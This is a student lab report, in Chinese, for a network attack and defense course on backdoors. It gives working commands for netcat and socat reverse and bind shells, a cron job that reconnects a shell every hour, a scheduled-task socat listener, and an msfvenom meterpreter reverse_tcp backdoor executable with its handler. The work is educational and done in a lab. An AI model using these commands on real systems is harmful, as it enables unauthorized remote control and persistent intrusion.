其他分享
首页 > 其他分享> > 2018-2019-2 20162318《网络对抗技术》Exp2 后门原理与实践

2018-2019-2 20162318《网络对抗技术》Exp2 后门原理与实践

作者:互联网

一、实验内容


1.使用netcat获取主机操作Shell,cron启动

2.使用socat获取主机操作Shell, 任务计划启动

3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝


二、实验步骤

2.1 使用netcat获取主机操作Shell,cron启动

2.1.1 windows下获得一个linux shell

step1. 在Windows中使用ipconfig查看本机ip地址

step2. 在Windows中使用ncat.exe程序打开监听

 ncat.exe -l -p 2318

step3. 在kali中反弹连接Windows

ncat 192.168.88.1 2318 -e /bin/sh

step4. Windows成功获得kali的shell,并使用ls命令查看当前目录

2.1.2 Linux 下获得Windows的cmd程序,cron启动

step1.
在Windows系统下,监听2318端口

 ncat.exe -l -p 2318

step2.在Kali环境下,用crontab -e指令编辑一条定时任务,选择编辑器时选择3

step3.在最后一行添加

10 * * * * /bin/netcat 192.168.88.1 2318 -e /bin/sh  //在每小时的第10分钟反向连接Windows主机的2318端口

step4.时间到达10分时,如下图所示:

2.2 使用socat获取主机操作Shell, 任务计划启动

2.2.1 Linux 下获得Windows的cmd程序

step1.在kali中使用ifconfig查看IP

step2.在kali中打开监听

nc -l -p 2318

step3.在Windows中反弹连接kali

ncat.exe -e cmd.exe 192.168.187.128 2318

step4.kali成功获得Windows的命令提示,并使用dir命令查看当前目录

2.2.2 使用socat获取主机操作Shell, 任务计划启动

step1.在“任务计划程序”中“创建任务”

step2.填写任务名

step3.填写触发器

step4.填写操作,导入socat.exe的路径,并添加参数:tcp-listen:2318 exec:cmd.exe,pty,stderr(把cmd.exe绑定到端口2318,同时把cmd.exe的stderr重定向到stdout上)

step5.到达约定时间后,在Kali环境下输入指令

socat -tcp:192.168.88.1:2318

此时可以发现已经成功获得了WINDOWSd的cmd shell

2.3 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

step1.在Kali上执行指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.187.128 LPORT=2318 -f exe > 20162318_backdoor.exe

step2.在Windows下执行

ncat.exe -lv 2318 > 20162318_backdoor.exe

step3.在Linux中执行

nc 192.168.88.1 2318 < 20162318_backdoor.exe

step4.在Kali上输入msfconsole指令进入msf控制台

root@20162318:~# msfconsole

step5.依次输入

use exploit/multi/handler //使用监听模块,设置payload
set payload windows/meterpreter/reverse_tcp /使用和生成后门程序时相同的payload
set LHOST 192.168.187.128 //设置ip
set LPORT 2318 //设置端口

step6.使用exploit开始监听

step7.运行Windows下的后门程序

step8.Linux获得Windows主机的连接,并且得到了远程控制的shell

2.4使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

step1.完成2.3的全部操作

step2.使用screenshot指令进行截屏

step3.尝试提权和获取摄像头权限失败

三、基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

当我们打开一个钓鱼邮件时,如果后台自动下载并安装木马程序,自动运行,因此在系统留下后门。

下载游戏修改器也可能会有后门

(2)例举你知道的后门如何启动起来(win及linux)的方式?

打开一些游戏的作弊器

通过修改注册表设置为开机自启动

(3)Meterpreter有哪些给你映像深刻的功能

截取受害主机的图片,获取录音等等

(4)如何发现自己有系统有没有被安装后门?

定期使用杀毒软件进行杀毒

四、实验总结与体会

本次实验使我明白了后门的可怕之处,所以以后要在正规网站下载正规软件,不下载游戏外挂之类可能会藏有后门的软件,其次是定期使用杀毒软件进行杀毒,防止存在有后门软件的软件的存在。

标签:exe,2318,Windows,Exp2,使用,20162318,2019,主机,ncat
来源: https://www.cnblogs.com/cs162318/p/10583138.html